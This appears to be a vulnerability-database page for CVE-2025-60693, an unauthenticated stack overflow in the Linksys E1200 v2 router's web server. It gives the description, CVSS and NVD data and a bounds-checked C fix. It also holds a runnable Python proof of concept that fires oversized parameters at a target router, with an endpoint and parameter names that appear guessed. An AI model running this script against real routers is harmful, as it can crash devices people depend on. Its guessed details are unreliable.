Security Vulnerability Report
CVE-2025-60693 CVSS 6.5 MEDIUM

CVE-2025-60693

Published: 2025-11-13 18:15:53
Last Modified: 2025-11-17 19:55:49

Description

A stack-based buffer overflow exists in the get_merge_mac function of the httpd binary on Linksys E1200 v2 routers (Firmware E1200_v2.0.11.001_us.tar.gz). The function concatenates up to six user-supplied CGI parameters matching <parameter>_0~5 into a fixed-size buffer (a2) without proper bounds checking, appending colon delimiters during concatenation. Remote attackers can exploit this vulnerability via specially crafted HTTP requests to execute arbitrary code or cause denial of service without authentication.
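The unchecked concatenation described above, next to a bounds-checked version, as an added example. This is not the vendor's code: the function names, the 18-byte buffer size and the rejection of missing parts are assumptions, since the page does not give the real size of the destination buffer.

```c
#include <stdio.h>
#include <string.h>

#define MERGE_PARTS   6
#define MERGE_BUF_LEN 18 /* assumed: "xx:xx:xx:xx:xx:xx" plus NUL */

/* Pattern from the description, shown for contrast and never called here:
 * every part is appended without comparing its length to the buffer size. */
void merge_unchecked(char *dst, const char *parts[MERGE_PARTS]) {
    dst[0] = '\0';
    for (int i = 0; i < MERGE_PARTS; i++) {
        strcat(dst, parts[i]);              /* part length is caller-controlled */
        if (i < MERGE_PARTS - 1) strcat(dst, ":");
    }
}

/* Bounds-checked merge: returns 0 on success, -1 if a part is missing or the
 * joined string (with delimiters and NUL) would not fit in dst_len bytes. */
int merge_checked(char *dst, size_t dst_len, const char *parts[MERGE_PARTS]) {
    size_t used = 0;
    if (dst == NULL || dst_len == 0) return -1;
    dst[0] = '\0';
    for (int i = 0; i < MERGE_PARTS; i++) {
        if (parts[i] == NULL) { dst[0] = '\0'; return -1; }
        size_t n = strlen(parts[i]);
        size_t sep = (i < MERGE_PARTS - 1) ? 1 : 0;
        /* Room is needed for n bytes, the delimiter and the terminating NUL. */
        if (n + sep >= dst_len - used) { dst[0] = '\0'; return -1; }
        memcpy(dst + used, parts[i], n);
        used += n;
        if (sep) dst[used++] = ':';
        dst[used] = '\0';
    }
    return 0;
}

int main(void) {
    char buf[MERGE_BUF_LEN];
    /* Constructed sample inputs. */
    const char *ok[MERGE_PARTS]  = {"00", "11", "22", "33", "44", "55"};
    const char *big[MERGE_PARTS] = {"00", "11",
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "33", "44", "55"};
    printf("ok  -> %d \"%s\"\n", merge_checked(buf, sizeof buf, ok), buf);
    printf("big -> %d \"%s\"\n", merge_checked(buf, sizeof buf, big), buf);
    return 0;
}
```

The check is done before each copy, so an oversized part is rejected with nothing written past the buffer and the output left empty.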

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:linksys:e1200_firmware:2.0.11.001:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:linksys:e1200:2:*:*:*:*:*:*:* - NOT VULNERABLE
Linksys E1200 v2 < firmware version E1200_v2.0.11.001_us

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-60693 PoC - Linksys E1200 v2 get_merge_mac Stack Buffer Overflow
# Target: Linksys E1200 v2 router (Firmware E1200_v2.0.11.001_us.tar.gz)
# Vulnerability: Stack-based buffer overflow in get_merge_mac function


def exploit_cve_2025_60693(target_ip, target_port=80):
    """
    Exploit for CVE-2025-60693
    This PoC demonstrates the buffer overflow by sending oversized parameters.
    Modify the payload based on actual firmware analysis.
    """
    base_url = f"http://{target_ip}:{target_port}"

    # Generate oversized parameters to trigger overflow
    # The function concatenates parameters _0 to _5 with colon delimiters
    # Total length exceeding the fixed buffer size will cause overflow
    overflow_length = 1024  # Adjust based on buffer size analysis
    padding = 'A' * overflow_length

    # Construct malicious CGI parameters
    params = {
        'mac_0': padding,
        'mac_1': padding,
        'mac_2': padding,
        'mac_3': padding,
        'mac_4': padding,
        'mac_5': padding
    }

    try:
        # Send crafted HTTP request
        response = requests.get(f"{base_url}/cgi-bin/merge_mac", params=params, timeout=10)
        print(f"[*] Request sent to {base_url}/cgi-bin/merge_mac")
        print(f"[*] Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[*] Request timed out - possible successful exploitation")
    except Exception as e:
        print(f"[!] Error: {e}")


def check_vulnerability(target_ip, target_port=80):
    """
    Check if target is vulnerable to CVE-2025-60693
    """
    base_url = f"http://{target_ip}:{target_port}"

    # Small test payload to check if merge_mac endpoint exists
    test_params = {
        'mac_0': 'test',
        'mac_1': 'test'
    }

    try:
        response = requests.get(f"{base_url}/cgi-bin/merge_mac", params=test_params, timeout=5)
        if response.status_code == 200:
            print(f"[*] Target {target_ip} has merge_mac endpoint")
            print(f"[*] Target may be vulnerable - proceed with exploitation")
            return True
        else:
            print(f"[*] Endpoint returned status {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error checking vulnerability: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_60693_poc.py <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80

    print(f"[*] Checking vulnerability on {target}...")
    if check_vulnerability(target, port):
        print(f"[*] Attempting exploitation...")
        exploit_cve_2025_60693(target, port)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60693", "sourceIdentifier": "[email protected]", "published": "2025-11-13T18:15:53.040", "lastModified": "2025-11-17T19:55:48.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow exists in the get_merge_mac function of the httpd binary on Linksys E1200 v2 routers (Firmware E1200_v2.0.11.001_us.tar.gz). The function concatenates up to six user-supplied CGI parameters matching <parameter>_0~5 into a fixed-size buffer (a2) without proper bounds checking, appending colon delimiters during concatenation. Remote attackers can exploit this vulnerability via specially crafted HTTP requests to execute arbitrary code or cause denial of service without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:e1200_firmware:2.0.11.001:*:*:*:*:*:*:*", "matchCriteriaId": "2461F974-2121-490C-A6CD-18B006070679"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:e1200:2:*:*:*:*:*:*:*", "matchCriteriaId": "4B14B800-5FCA-4E2B-A42B-EBE6EEC8FBB1"}]}]}], "references": [{"url": "http://linksys.com", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://github.com/yifan20020708/SGTaint-0-day/blob/main/Linksys/Linksys-E1200/CVE-2025-60693.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.linksys.com/", "source": "[email protected]", "tags": ["Product"]}]}}